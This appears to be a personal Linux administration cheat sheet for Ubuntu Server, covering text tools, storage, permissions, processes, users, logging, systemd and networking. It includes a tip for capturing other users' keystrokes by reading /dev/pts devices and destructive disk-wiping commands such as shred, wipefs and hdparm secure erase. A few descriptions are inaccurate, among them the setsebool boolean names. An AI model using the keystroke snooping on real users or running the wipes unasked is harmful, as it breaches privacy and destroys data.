My personal Linux system administration reference (based on Ubuntu Server)
- Todo
- Other Resources
- General and Misc
- Text and File Processing
- Storage and Filesystem
- Process Management
- User Administration
- System Management and Observability
- Networking
- Docker
- Git
- Bash
- Vim
- GDB
- Binary Analysis
- ASCII Art and Silly Stuff
- Credits
- Distinguish standard vs non-standard tools and filter out frivolous tools
- Distinguish or extract the most useful commands
- Pure bash Bible by dylanaraps (https://github.com/dylanaraps/pure-bash-bible)
- Pure sh Bible by dylanaraps (https://github.com/dylanaraps/pure-sh-bible)
- BusyBox is a package that contains many core Unix utilies needed for debugging. It's useful to install on a minimal machine when testing.
busybox <common-unix-utility>if you're just going to run a single command, maybe twobusybox --install <dir-path>to install the commands to that directory (usually/sbin) for standalone use of all commands- It comes pre-installed in the Docker Alpine image
- Help
man(an interface to the system reference manuals)-a introto display allintromanpages-korapropos(search the manual page names and descriptions)-forwhatis(display one-line manual page descriptions)
info(read Info documents interactively)help(display information about builtin commands)tldr(simplified and community-driven man pages)
parallelglowglow -p -w 0 file.md
watch(execute a program periodically, showing output fullscreen)watch -n 1 wto executewevery second (-n 1) and refresh the screen with the updated output
env(run a program in a modified environment)printenv(print all or part of environment)- Dates and Time
date(print or set the system date and time)date +%Fto print date in formatYYYY-MM-DDdate +%Y%m%dto print date in formatYYYYMMDDdate +%jto print the day of year (jstands for Julian, as in "the Julian day")date --date='now-100daysto calculate the full and exact date of 100 days ago from now using Julian days for this year (eg,date +%j)
timedatectl(control the system time and date)- See
/etc/localtime timedatectlto see current time settingstimedatectl set-timezone America/Los_Angelesto set timezone to Los Angelestimedatectl list-timezones
- See
- Package management
dpkg(package manager for Debian)dpkg -ldpkg -Ldpkg -S
aptapt list --installedto list installed packagesapt show <package>to show information for a packageapt search <string>to find packages containing a specified string in their information (useful for finding the package a command belongs to)
tee(read from standard input and write to standard output and files)date | tee <file>writes the output ofdateto standard output and<file>tee -a <file>to append to<file>instead of overwrite
cat /dev/urandom(When read, the/dev/urandomdevice returns random bytes using a pseudorandom number generator seeded from the entropy pool)- See
man urandom
- See
- Security
clamav- Intrusion prevention systems
fail2ban
- Intrusion detection systems
aidesnorttripwire
exiftool(read and write meta information in files)reset(initialize or reset terminal state)seq(print a sequence of numbers)seq [from=1] <to>to print numbersfromtoto, each on a new lineseq 5to print numbers 1 through 5, each on a new lineseq 0 5to print numbers 0 through 5, each on a new line
nl(number lines of files)nl <file>to print out file contents with line numbers
uniq(report or omit repeated lines)uniq <file>to print every unique line from<file>, omitting repetitionsuniq -u <file>to print every unique line that occurs once in<file>
csplit(split a file into sections determined by context lines)tr(translate or delete characters)cut(remove sections from each line of files)cut -d ' ' -f1 <file>to cut the first (-f1) section from<file>delimited by blank spaces
bc(an arbitrary precision calculator language)echo '1+2' | bcto sum the expression
wc(print newline, word, and byte counts for each file)wc -lto count lines
head(output the first part of files)-n <lines>to output first<lines>lines-c <bytes>to output first<bytes>bytes
tail(output the last part of files)-n <lines>to output last<lines>lines-f <file>to follow file changes, appending output as file grows
sort(sort lines of text files)-nto sort numerically instead of lexicographically-rto reverse order-kto sort by keysort -k 2 <file>to sort by the second column
paste(merge lines of a file)paste <file> -sd+to collapse lines of a file to single line with each element separated by+- Example:
seq 100 > numbers; paste numbers -sd+ - Mix and Match:
seq 100 > numbers; paste numbers -sd+ | bcto sum the numbers innumbers
- Example:
sed(stream editor for filtering and transforming text)sed -n '275p' <file>to print out the 275th line of<file>
awk(pattern scanning and processing language)awk '{print $2}'to print the second column of standard inputawk '{if ($1>200) print $1,$2}'to check if the first column of standard input is greater than 200 and print the first two columns if so
- Diffing and patching
diff(compare files line by line)diff --color <file1> <file2>
patch(apply a diff file to an original)
hdparm(get/set SATA/IDE device parameters)-I /dev/<sata-device>to list device parameters for a SATA devicehdparm --security-enhanced-erase NULL /dev/<sata-device>to perform an optimized secure erase of a SATA device using an empty password (NULL)
nvme(the NVMe storage command line interface utility; fromnvme-cli)nvme format /dev/<nvme-device> -s 1to perform a secure erase of an NVMe disk- See
man nvme-format
- See
/dev/zerois a continuous stream of zeroesstat(display file or file system status)ls -l <file-name>follows the format<access-permissions> <number-of-hard-links> <UID> <GID> <creation-month> <creation-day> <creation-time> <file-name>du(estimate file space usage)-hfor human-readable format-sfor summary
df -h(report file system space usage in human-readable format)
grep(print lines that match patterns)grep -Iri --exclude-dir=.git "<search-pattern>"to search<search-pattern>, excluding binaries (-I), recursive (-r), case insensitive (-i), and excluding.git/grep -wE "53|67|68" /etc/servicesto look up what ports 53, 67, and 68 correspond to in/etc/servicesgrep '^word' <file>to find instances ofwordthat are at the beginning of a line-Eto allow "extended" regular expressions (or useegrep)-Rto search recursively through subdirectories (or usergrep)-Fto interpret<search-pattern>as fixed strings, not regular expressions-wto search whole words-lto print only the filename on match and continues to next file-vto print non-matching lines-eprotects-in expressions containing-
find- Common example:
find <path> -name <filename>to find a file - Flags:
-exec <command> {} +execute<command>in the current subdirectory, in case we are recursive and in a different directory from which we started-executableto find files with execution permissions-name "*.sh"to find files with.sha suffix-perm 777-perm -022-perm /6000to find setuid (4000) and setgid (02000) programs-type fto find files-type dto find directories
- Common example:
cpio(copy files to and from archives)mkfifo(make FIFOs (named pipes))dd(convert and copy a file)- Flags:
if=<file>to specify a file to read from instead of standard inputof=<file>to specify a file to write to instead of standard outputbs=<size>to specify the block size to both read from the input file and write out to the output filecount=<count>to specify the number of times to read/write
- Example:
dd if=/dev/zero of=zeroes bs=1M count=2to read 2MB (countblocks of size1M) of zeroes from/dev/zeroesand write them out tozeroes
- Flags:
tartar -vczf files.tar.gz file1 file2 file3to create (-c) agzip-compressed (-z) archive namedfiles(-f files) out of the listed filestar -vxf files.tar.gzto both decompress (if applicable) and extract (-x) an archive namedfiles(-f files) out into the CWD
- Prefer
hdparm(SATA) andnvme-cli(NVMe) for more proper and significantly faster hardware-based secure erasure (let the drive erase itself internally) rather than software-based erasure (manual sequential writing of bytes), which usually doesn't account for "smarter" modern drive features such as wear leveling or sector remapping, which can prevent actual full secure erasure shred(overwrite a file to hide its contents, and optionally delete it: do not use without understanding the caveats listed in the documentation referenced below; almost certainly usehdparmornvme-cliinstead)- Read the caveats before use: https://www.gnu.org/software/coreutils/manual/html_node/shred-invocation.html#shred-invocation
-vto show progress-zto zero the file after overwriting to hide shredding-uto delete the file after overwriting- Example procedure
wipefs --all /dev/<device>(seewipefs)shred -vz /dev/<device>to overwrite the disk with random data and then zero- Optional:
blockdev --rereadpt(seeblockdev) to inform the kernel that the partition table has been modified (assuming you overwrote a disk with paritions before clearing them out). This may not be enough, and you may need to just reboot instead.
nwipe(securely erase disks)
/etc/fstab(static information about the filesystems)- See
man fstabfor field descriptions and proper usage information - System administrator manages this file, other programs only read it
- Configures filesystems and where/how to mount at startup
- Format:
<device> <mount-point> <filesystem-type> <options> <dump> <pass> mount -ato mount changes specified in the configuration file
- See
/dev/sda1would be the first partition (1) of the first detected (a) disk (sd, short for "SCSI Disk", an old format)lsblk(list block devices)lsblkto list block devices-ffor an overview of filesystem data
blkid(locate/print block device attributes; can typically just uselsblk -f)dumpe2fs(dump ext2/ext3/ext4 file system information)dumpe2fs /dev/<device>to dump filesystem information for device
wipefs(wipe a signature from a device)wipefs /dev/<device>to print information about a device and its partitionswipefs --all /dev/<device>to erase all partition signatures and inform the kernel of the change
fdisk(manipulate disk partition table)fdisk -l [device]to list information and partition tables for all devices or the specified device
mkfs(build a linux filesystem; lets you format a device)mkfs.vfat /dev/<device>
tune2fs(adjust tunable file system parameters on ext2/ext3/ext4 file systems)tune2fs -l /dev/<device>(list the contents of the file system superblock, including configurable parameters)
blockdev(call block device ioctls from the command line)--rereadptto request the kernel to re-read the partition table
findmnt(find a filesystem)mount(mount a filesystem)mountto see mounted filesystems-ato mount filesystems specified in/etc/fstab- Reads from
/proc/mounts(symlink to/proc/self/mounts) (or the deprecated/etc/mtabon older systems)
- Reads from
mount /dev/<device> /mnt/<mount-point>to mount a device to mount point
umount(unmount filesystems)umount /mnt/<mount-point>to unmount filesystem mounted at mount point
/proc/self/mountinfocontains a table of mounted filesystems (generated by kernel)
See man lvm
- Physical volumes (PVs)
pvs [PVs]to list physical volumespvdisplay [PVs]to display detailed information about physical volumespvcreate <disks>to turn disks into a physical volumepvremove <PVs>to remove LVM labels from physical volumes
- Volume groups (VGs)
vgs [VGs]to list volume groupsvgdisplay [VGs]to list volume groupsvgcreate <name> <PVs>to create a volume groupvgremove <VGs>to remove volume groups
- Logical volumes (LVs)
lvs [LVs]to list logical volumeslvdisplay [LVs]to display detailed information about logical volumeslvcreate -n <name> <VG>to create a logical volume-l <extent>to specify the logical extent
lvremove <LVs>to remove logical volumes
DAC is the baseline access control scheme, where the owner of a resource (file, process, etc) specifies its permissions.
- NOTE! When changing file permissions, especially recursively, beware of changing directories, regular files, scripts, and so on indiscriminately
- Typically, you'll want to use
findin the form offind <path> -type d -exec chmod -c <xxx> {} +to set the appropriate permissions for, in this example, directories, and using-type dfor directories- For example:
- Directory: With
rset on a directory, a user can read its contents. Ifxis also set, a user cancdinto the directory - Regular file: With
rset on a regular, a user can read its contents. Ifxis also set, a user can execute it. This should not be set if the file is not supposed to be a directly-executable script - Thus, while it's okay to mark subdirectories with the
xbit (if you're okay with the user traversing them), settingxon regular files should be done discriminately, not en mass
- Directory: With
- For example:
- Typically, you'll want to use
chmod(change file mode bits)-cto show changes-Rfor recursive
chattr(change file attributes on a Linux file system)chgrp(change group ownership)chgrp -c <group> <file>to change<file>'s<group>to<group>and show changes made (-c)-Rfor recursive
chown(change file owner and group)chown -c <user> <file>to change<file>'s<owner>to<owner>and show changes made (-c)-Rfor recursive
umask(display or set file mode creation mask)umaskto see current file mode creation maskumask <mask>to set the file mode creation mask- Example
- With default regular file creation mode
0666(RW for UGO) - With default umask of
0022 touch testfilewill createtestfilewith permissions0644(0666 & ~0022)
- With default regular file creation mode
ACL extends/compliments the standard DAC scheme, providing more fine-grained control over resource permissions.
See man acl
getfacl(get file access control lists)setfacl(set file access control lists)- Setting the default ACL for a directory causes new subdirectories and files to inherit those default ACLs
setfacl -m u:<username>:rwx <file>to allow R/W/X on file for the usersetfacl -m u::rwx <file>to allow R/W/X on file any userssetfacl -x u:<username> <file>to remove the ACL permissions set for the user
MAC is another access control scheme which provides a global configuration of resource permissions, typically managed by root rather than resource owners. The kernel checks DAC and ACL permissions on resource access before MAC, overriding the former two if more restrictive.
It is commonly found in the SELinux (Security-Enhanced Linux) and AppArmor Linux kernel modules.
Security-Enhanced Linux (SELinux) is an implementation of a flexible mandatory access control architecture in the Linux operating system
- See
man selinux- Red Hat Enterprise Linux documentation on SELinux: https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/10/html/using_selinux/getting-started-with-selinux
- Rocky Linux documentation on SELinux: https://docs.rockylinux.org/guides/security/learning_selinux/
sestatusfor SELinux status-vto see file and process contexts-bto see policy booleans
- Configuration:
/etc/selinux/config getenforce(get the current mode of SELinux)setenforce(modify the mode SELinux is running in)setenforce [ Enforcing | Permissive | 1 | 0 ]
ls -Z [<file>](print any security context)ps -eMorps axZto see the security label of every running processgetseboolto get SELinux boolean valuesgetsebool -ato get all boolean valuesgetsebool httpd_can_connect_ftpto get value ofgetsebool httpd_can_connect_ftpboolean
setsebool(set SELinux boolean value)setsebool httpd_can_network_connect onto set thehttpd_can_connect_ftpboolean on, resets on rebootsetsebool -P httpd_can_network_connect onto set thehttpd_can_connect_ftpboolean on, permanent (-P)
- The current process:
echo $$to print the PID of this current running processcd /proc/self/to access the data for the current running process
ltrace(library call tracer)ltrace -p <PID>to monitor library calls made by process<PID>
strace(trace system calls and signals)strace -p <PID>to monitor syscalls made by process<PID>strace -p <PID> -e trace=readto tracereadsyscalls emitted from process<PID>strace <command>to run<command>understraceobservation- Mix and Match:
strace -p $(pgrep <process-name>)
lsof(list open files)lsof /dev/tty1to list processes currently using that filelsof -i :22to list processes using or listening by any network address on port 22 (netstat -pand variants are the modern ways to do this)
ps(report a snapshot of the current processes)psto report on all processes with the same EUID as the current user and processes associated with the same terminal as the invokerps <pid>to report on a specific process-ffor full formatps -eMorps axZto see the security label of every running process- Mix and Match: Use a bracket expression trick
[<char>]ingrep's regular expression parsing to removegrep's process frompsoutput:ps -ef | grep -i [s]sh- See
Character Classes and Bracket Expressionsinman grep - This works because
grep's process command line now technically contains[s]sh, which still expands tosshas our actual search term
- See
- Standard syntax
ps -ef --forestto see every process on the system using standard syntax and with ASCII art process tree (--forest)-Ffor extra full format
- BSD syntax
ps auxto see every process on the system using BSD syntaxps axjfto print a process tree
pgrep,pkill,pidwait(look up, signal, or wait for processes based on name and other attributes)pgrep -a <name1|name2>to see processes matching<name1>or<name2>and show the full command lines for those processespgrep -af <pattern>to see processes matching<pattern>, as well as processes whose full commands contain<pattern>, and show the full command lines for those processespgrep -u <user>to see running processes attached to<user>pgrep -u <user> <process-name>to see running processes matching<process-name>attached to<user>
fuser(identify processes using files or sockets)fuser /dev/tty1will show the PID of processes currently using that filefuser -v /dev/tty1will show the user, PID, command, and how the access is being made, of processes using that filefuser -km /homewill kill (-k) all processes accessing the mounted directory (-m; as opposed to regular file?)/homefuser -vm /homewill list all processes accessing the mounted directory (-m)/home
- Mix and Match: Access the data of a specific running process
cd /proc/<PID>ls -lacat environto read the environment variables for the processcat cmdlineto read the full command which started the processstrace -p <PID>to monitor syscalls made by the process
pidstat(report statistics for Linux tasks; fromsysstat)pidstat-pto report for PID
su(run a command with a substitute user and group ID)suto drop into arootshellsu <user>to drop into a<user>shellsu --login <user>to drop into a<user>login shell-c <command>to run a command as the user-s <shell>to specify shell-lto start the shell as a login shell
sudo-ito run the login shell asroot(ie, becomeroot)-l [-U <user>]to list user's command privileges andsudoconfigurations as configured in sudoers configuration (/etc/sudoersor/etc/sudoers.d/)
write(send a message to another user)write <username> <tty-or-pts>starts a session where you can send messages to the user on their tty, one way
mesg(display (or do not display) messages from other users)talk(talk to another user)wall(write a message to all users)
whoami(print effective user name)id(print real and effective user and group IDs)idfor output on current userid <user>for output on specified user
groups(print the groups a user is in; probably preferid)groupsto show the groups the current user is ingroups <user>to show the groups<user>is in
- See who's logged in:
whoandwread the binary log file/var/run/utmpto see currently logged in userswho(show who is logged on)who -Hto show who's logged in, with headingswho -Hato show who's logged in, with most of the other flags enabled for detail
w(show who is logged on and what they are doing; probably preferwho)users(print the user names of users currently logged in to the current host; probably preferwhoorw)
last(show a listing of last logged in users)lastoutputs from most recent to least recent, so use withheadorlesslast -areads the binary log file/var/log/wtmpto see past logins, with host names at the end (-a)last <username>to see past logins from<username>last -p <time>to see users who were present at<time>last -s <time>to see past logins since<time>last -u <time>to see past logins until<time>-xto include shutdown entries and run level changes-dto show DNS-resolved hostnames-iso show IPs instead of names
lastbreads the binary log file/var/log/btmpto see bad login attempts (I believe this is bad password attempts?)- Mixed and Matched: Count past logins for a user or IP
last <username-or-ip> | grep -c <username-or-ip>(we usegrepto search for<username-or-ip>again and count-cbecauselasthas a couple extra lines of output
- Mixed and Matched: Monitor keystrokes
who -Hto see users logged in and what terminal lines they're connected tols /dev/ptsto see pseudo terminalscat /dev/pts/nto capture keystrokes if the user is using a pseudoterminal (Tmux, SSH, etc)cat /dev/ttyto capture keystrokes if the user is using a standard terminalttyvspty- A
ttyis a console directly interacted with by the user - A
pty(pseudoterminal) is a connection/interface established by a program like SSH or Tmux which allows tty-like interaction via it - See
man pts(pseudoterminal master and slave)
- A
- Group accounts:
groupmod(modify a group definition on the system)groupmod -U <user> -a <group>to append (add) (-a) user-U <user>to<group>
groupadd(create a new group)groupdel(delete a group)
- User accounts:
- See
sysusers.din the section: System Management and Observability useradduseradd <new-user> -m -s /bin/bash -g <primary-group>to create<new-user>with a home directory (-m),bashas shell (-s /bin/bash), and with primary group<primary-group>(-g <primary-group>) (NOTE(SECURITY): DO NOT SUPPLY PLAINTEXT PASSWORD ON COMMAND LINE, SEE MANPAGE)- This creates a locked user account due to correctly not passing a password
- This security warning applies to
usermod -p <new-user>
- This security warning applies to
passwd -de <new-user>to effectively unlock the account and allow the new user to log in and require them to set a password.- NOTE(SECURITY): Only do this when the new user is ready to log in via password. If the user will only ever log in via SSH, they don't even need a password. You may keep the password locked and use their public key for authentication instead of password login.
- This creates a locked user account due to correctly not passing a password
userdelusermod(modify a user account)usermod -G -a <group>to append (add) current user to<group>usermod <user> -pto set password to locked<user>account
- See
passwd(change user password)passwd <user>to change user password- Account status:
passwd -Sto see account status for current userpasswd -Sato see the account status for all users
passwd -dto delete a user's password (make it empty)passwd -eto immediately expire an account's password, requiring change at next loginpasswd -i <INACTIVE-days>to disable an account after password has been expired for<INACTIVE-days>passwd --expiredate 1to immediately disable an account, after setting the above
passwd -lto lock the password of a user so they cannot change itpasswd -uto unlock
- User account configuration and password information
pwconvto move salted passwords hashes from public/etc/passwdto locked down/etc/shadow(use on old systems that haven't converted to using/etc/shadow)/etc/passwddetails user account configuration:username:x:UID:GID:full-name:home-directory:shell- The
xin the password field means that passwords are stored in/etc/shadow, which has stricter permissions/etc/shadowformat (seeman shadow):username:encrypted-password:last-change-date:minimum-age:maximum-age:warning-period:inactivity-period:account-expiration-date:reserved
- All users can typically read
/etc/passwd, but onlyrootcan modify it - Only
rootcan access/etc/shadow - Salted password hashes are stored rather than the actual plaintext passwords
- The
- Reading: https://www.redhat.com/en/blog/suid-sgid-sticky-bit
- SUID/SGID
- The SUID (setuid) permission bit of a binary executable file
- Sets the running EUID to that of the binary executable's owner rather than that of the user who actually executed it (RUID)
- Represented by
4in the user execution bit, or symbolicsif the owner has execute permission andSif the owner does not have execute permission
- The SGID (setgid) permission bit of a binary executable file
- Sets the running EGID to that of the binary executable's group owner rather than that of the user's primary group that actually executed it (RGID)
- Represented by
2in the group execution bit, or symbolicsif the group has execute permission, orSif the group does not have execute permission
- NOTE(SECURITY): For files owned by a privileged user/group, SUID/SGID can permit unprivileged users to execute a program with elevated privileges when the permissions for the file are not locked down (eg, if unprivileged users are allowed to execute an SUID/SGID file)
- For security, shells such as Bash ignore setuid and run as the real user
- Find SUID/SGID programs with
find / -perm /6000
- The SUID (setuid) permission bit of a binary executable file
- The "sticky" permission bit
- When set on a directory, prevents users from deleting or renaming containing files they do not own
- Does nothing when applied to regular files
- Represented by
1or symbolictin the other users execution bit
- RUID (real user ID) is the UID for the user who launched a process
- EUID (effective user ID) is the UID from which the process inherits its permissions
- Octal/symbolic permissions format:
Bit positions: 0 x 0 0 0 0
S U G O
| | | |
| | | Other users (rwx)
| | Group (rwx)
| User/owner (rwx)
Special (setuid/setgid/sticky)
UGO bits: 4 2 1
r w x
| | |
| | Execute
| Write
Read
S bits: 4 2 1
| | |
| | sticky (replaces Other Users' Execute bit with t if x set or T if x not set)
| setgid (SGID; replaces Group's Execute bit with s if x set or S if x not set; affects binaries only)
setuid (SUID; replaces User's Execute bit with s if x set or S if x not set; affects binaries only)
sysusers.d(declarative allocation of system users and groups)man sysusers.d- systemd-sysusers uses the files from sysusers.d directory to create system users and groups and to add users to groups, at package installation or boot time
lsmod(show the status of modules in the Linux Kernel)- Reads
/proc/modules
- Reads
sysctl(configure kernel parameters at runtime)<variable>to display a parameter-w <variable>=<value>to set a parameter-ato display all available parameters-p [file]to reload the parameters set from[file]or/etc/sysctl.conf--systemto reload and display parameters set from the system's configuration files
hostname(show or set the system's host name)/etc/hostnamespecifies the persistent hostname (read on startup)hostname -Ito display IP addresses
uptime(tell how long the system has been running, load averages, and how many users are logged in)- Reads and processes
/proc/uptime
- Reads and processes
cat /etc/*releaseto see system distribution information- See
find /etc/*releaseto see files read to obtain this information
- See
uname(print system information)uname -ato print all information
lsb_release(print distribution-specific information (minimal implementation))lsb_release -ato show distributor ID, description, release number, and codename
cat /proc/cmdlineto see kernel command line options (TODO: Why is this different than the command line shown indmesg | head?)ulimit(modify shell resource limits)ulimit -ato report all current limitsulimit -cto report limit on core dump size for the current shell0indicates that core dumping is disabled
ulimit -c <limit>to specify the size limit for core dumps
WARNING: Enabling core dumps -- particularly universally -- can be risky. A core dump is a snapshot of a process taken at the time a process exits abnormally. Since this snapshot contains the process's memory and execution context, it can contain sensitive information. Proper care should be taken to manage core dumps when enabled, such as restricting access to other users and regular deletion. Do your own research, and don't enable them blindly.
See man core
- Ephemeral (for the current shell only)
ulimit -c unlimitedto enable unlimited core dumps for the current shell only (ephemeral)
- Persistent (using shell init configuration)
- NOTE: This will enable core dumps only for processes launched by the shell rather than all processes launched through any means. You can modify the PAM limits configuration if you need core dumps enabled for all processes. In addition, for
systemd-managed sessions, you can specify the core dump limit for a specific process) - Append
ulimit -c unlimitedto your shell init (eg,.bashrc)
- NOTE: This will enable core dumps only for processes launched by the shell rather than all processes launched through any means. You can modify the PAM limits configuration if you need core dumps enabled for all processes. In addition, for
- Persistent (using PAM limits configuration; NOTE: Incomplete)
- Create the drop-in
/etc/security/limits.d/99-coredump.conf - TODO: Configuration file
- Create the drop-in
/proc/sys/kernel/core_patternstores a pattern to specify the core save location or pipe to program to process it- Common core patterns
core.%e.%pto store core dumps beside the program (CWD is default)/var/dumps/core.%e.%pto store core dumps in a centralized location- Variables
%e: Executable name%p: PID%t: Timestamp (epoch)%h: Hostname%u: RUID
- Ephemeral modification (persists until reboot)
/proc/sys/kernel/core_pattern
- Persistent modification
- Create the drop-in
/etc/sysctl.d/99-coredump.conf - Insert
kernel.core_pattern = <core-pattern> sysctl --systemto reload the configuration- Alternative method (Not recommended: prefer drop-in configuration to preserve this default)
sysctl -w 'kernel.core_pattern = <core-pattern>'to overwrite the current rule
- Create the drop-in
rsyslogsar(collect, report, or save system activity information; fromsysstat)-bfor I/O statistics-n <type>for network statistics--iface=<iface>for a specific network interface- Example:
sar -n TCP 1to print TCP statistics for all interfaces every 1 second
dmesg(print or control the kernel ring buffer)dmesg -Tw(show log messages in human-readable time format (-T) and in real time (-w))dmesg | headto see the early kernel command line options (TODO: Why is this different than shown incat /proc/cmdline?)dmesg | tailto see the latest log messages
/var/log/contains log filesdmesgfor Kernel ring buffer (hardware and driver)apt/history.logfor package install/removal historysyslog(Ubuntu) ormessages(Red Hat) for daemon logs, system messages, and non-authorization eventsauth.log(Ubuntu) orsecure(Red Hat) for authorization attempts (logins, SSH, etc)journal/for binarysystemdjournal files managed bysystemd-journald- See: Section on
journalctl;/run/log/journalfor volatiletmpfsjournals;man tmpfs
- See: Section on
- ...and more
lokisysloggerauditd
lspci(list all PCI devices)lsusb(list USB devices)iostat(Report Central Processing Unit (CPU) statistics and input/output statistics for devices and partitions; fromsysstat)iostat [interval [count]] [-d] [device-name]to report block device statistics-cto report CPU statistics-xfor extended statistics-zto omit statistics for devices showing no activity
- See
iostat lscpu(display information about the CPU architecture)chcpu(configure CPUs)mpstat(report processor-related statistics; fromsysstat)mpstatto print a summary CPU utilization reportmpstat 1to print a report every 1 second-P ALLto print statistics for all processors
nproc(print the number of processing units available)cat /proc/cpuinfoto see CPU specs and infocat /proc/cpuinfo | grep -c processorto count the number of processors
cat /proc/meminfoto see detailed memory informationfree(display amount of free and used memory in the system)-hfor human-readable-tto include total-mto display in mebibytes
vmstat -S M(show virtual memory statistics in units of MB-S M)
- NOTE: See
man systemd systemctl(control the systemd system and service manager; this issystemd's control interface)systemctl statusto show runtime status info on the whole systemsystemctl status <unit>to show runtime status info for a unitsystemctl show <unit>to show the properties of a unitsystemctl cat <unit>to show the backing files of one or more unitssystemctl restart <unit>to restart a systemd unitsystemctl list-unitsto list unitssystemdcurrently has in memorysystemctl list-socketsto list socket units currently in memory, ordered by listening addressessystemctl list-timersto list timer units currently in memory, ordered by when they elapse next
journalctl(print log entries from the systemd journal)- Storage location and format
- Journals are stored in binary format
- Persistent journals stored in
/var/log/journal/, volatile journals stored in/run/log/journal/(see section on logging) journalctlmerges both sources in output
journalctl -fto see log messages in real timejournalctl -bto see all logs since boot of current sessionjournalctl -u wpa_supplicantto see logs pertaining to thewpa_supplicantservice
- Storage location and format
resolvectl(resolve domain names, IPV4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS resolver)- Front-end (or sometimes a symlink) to
systemd-resolveand primary way of interacting withsystemd-resolved /etc/resolv.confis the standard DNS resolver configuration file for specifying DNS nameservers, usually managed bysystemd-resolved, but sometimes bynetplanand others depending on distro and configuration choiceresolvectlto display the global and per-link DNS settings currently in effect- Options
status <link>to display the DNS settings currently in effect for a linkquery <hostname|address>statisticsto display general resolver statistics, including information whether DNSSEC is enabled and available, as well as resolution and validation statisticsshow-server-stateto display detailed server state information, per DNS Servermonitorto display a continuous stream of local client resolution queries and their responsesflush-caches
- Front-end (or sometimes a symlink) to
systemd-resolve(deprecated in favor ofresolvectl)systemd-analyze(analyze and debug system manager)systemd-analyze blameto print all running units, ordered by initialization time
man systemd:
CONCEPTS systemd provides a dependency system between various entities called "units" of 11 different types. Units encapsulate various objects that are relevant for system boot-up and maintenance. The majority of units are configured in unit configuration files, whose syntax and basic set of options is described in systemd.unit(5), however some are created automatically from other configuration files, dynamically from system state or programmatically at runtime. Units may be "active" (meaning started, bound, plugged in, ..., depending on the unit type, see below), or "inactive" (meaning stopped, unbound, unplugged, ...), as well as in the process of being activated or deactivated, i.e. between the two states (these states are called "activating", "deactivating"). A special "failed" state is available as well, which is very similar to "inactive" and is entered when the service failed in some way (process returned error code on exit, or crashed, an operation timed out, or after too many restarts). If this state is entered, the cause will be logged, for later reference. Note that the various unit types may have a number of additional substates, which are mapped to the five generalized unit states described here.
The following unit types are available: 1. Service units, which start and control daemons and the processes they consist of. For details, see systemd.service(5). 2. Socket units, which encapsulate local IPC or network sockets in the system, useful for socket-based activation. For details about socket units, see systemd.socket(5), for details on socket-based activation and other forms of activation, see daemon(7). 3. Target units are useful to group units, or provide well-known synchronization points during boot-up, see systemd.target(5). 4. Device units expose kernel devices in systemd and may be used to implement device-based activation. For details, see systemd.device(5). 5. Mount units control mount points in the file system, for details see systemd.mount(5). 6. Automount units provide automount capabilities, for on-demand mounting of file systems as well as parallelized boot-up. See systemd.automount(5). 7. Timer units are useful for triggering activation of other units based on timers. You may find details in systemd.timer(5). 8. Swap units are very similar to mount units and encapsulate memory swap partitions or files of the operating system. They are described in systemd.swap(5). 9. Path units may be used to activate other services when file system objects change or are modified. See systemd.path(5). 10. Slice units may be used to group units which manage system processes (such as service and scope units) in a hierarchical tree for resource management purposes. See systemd.slice(5). 11. Scope units are similar to service units, but manage foreign processes instead of starting them as well. See systemd.scope(5). Units are named as their configuration files. Some units have special semantics. A detailed list is available in systemd.special(7).
/etc/hosts.allow(deprecated)/etc/nsswitch.confcontains configuration for DNS resolution order, as well as for other items/etc/hostscontains static DNS configuration (short-circuits external DNS resolution attempts)192.168.0.100 myserver
- Mix and Match Watch DNS traffic halt after manually resolving DNS lookups locally:
tcpdump port 53to monitor port 53 (DNS) trafficwatch -n 0 arpto makearprun repeatedly very quickly so we can see it attempt to resolve the IP addresses stored in the ARP cache to names for display- Add
<ip-addr> <name>to/etc/hosts, save it, and watch the external DNS traffic dissappear due to resolving via the local hosts file
- Mix and Match Watch DNS traffic halt after manually resolving DNS lookups locally:
/etc/serviceslists default port service designations- See
resolvectlin systemd for configuration of DNS resolvers
host(DNS lookup utility)arpingarping -i eth0 192.168.0.51to ARP ping that host via interfaceeth0
iftop(display bandwidth usage on an interface by host)ifstat(report interface activity, just like iostat/vmstat do for other system statistics)knock(port-knock client fromknockdpackage)knock myserver.example.com 123:tcp 456:udp 789:tcpto test knock sequences on those ports on that server (I think)
socat(multipurpose relay (SOcket CAT))curlifconfig.me (get WAN IP address)-Lto follow redirects-vfor verbose output (often very useful)
cowrie(SSH/Telnet Honeypot; https://docs.cowrie.org/en/latest/index.html)host1$ docker run -p 2222:2222 cowrie:latesthost2$ ssh root@localhost -p 2222
dhclientdhcpcd(a DHCP client)--release--rebind--renew--dumplease [interface]to dump lease information for all interfaces or for a specific one
netplan- Logging
/var/log/cloud-init-output.logcontains log info/var/log/cloud-init.logcontains log info- NOTE! This log file can contain plaintext SSIDs and passwords when configuring wireless networking
- Configuration
/etc/netplan/50-cloud-init.yamlis the default network configuration file for user- See
man netplanfor configuration details and https://netplan.readthedocs.io/en/0.105/examples.html for examples
--debugto enable debug messagesnetplan statusnetplan generatenetplan tryto temporarily applynetplanconfiguration changes for testing and apply if confirmednetplan applyto applynetplanconfiguration changes
- Logging
- See
netcat - See
telnet(TODO) scp(OpenSSH secure file copy)rsync(a fast, versatile, remote (and local) file-copying tool)rsync -vaz large-directory <user>@<host>:<path>will verbosely (-v) compress (-z) and recursively copy (-a, also preserving metadata) a directory to another host over SSH
sftp
- See
dnsutils? host(DNS lookup utility)iperf3(perform network throughput tests)iperf3 -sto listeniperf3 -c <address>to connect
mtr(a network diagnostic tool)- mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool
mtr -trunsmtrin terminal mode
nmap- Do read the book: https://nmap.org/book/toc.html. Useful chapters:
- https://nmap.org/book/nmap-overview-and-demos.html
In a pen-testing situation, you often want to scan every host even if they do not seem to be up. After all, they could just be heavily filtered in such a way that the probes you selected are ignored but some other obscure port may be available. To scan every IP whether it shows an available host or not, specify the -Pn option instead of all of the above.
- https://nmap.org/book/nmap-phases.html
- See https://nmap.org/book/legal-issues.html for practical suggestions on continuing exploration while avoiding trouble with ISPs, system administrators, and the law
- https://nmap.org/book/nmap-overview-and-demos.html
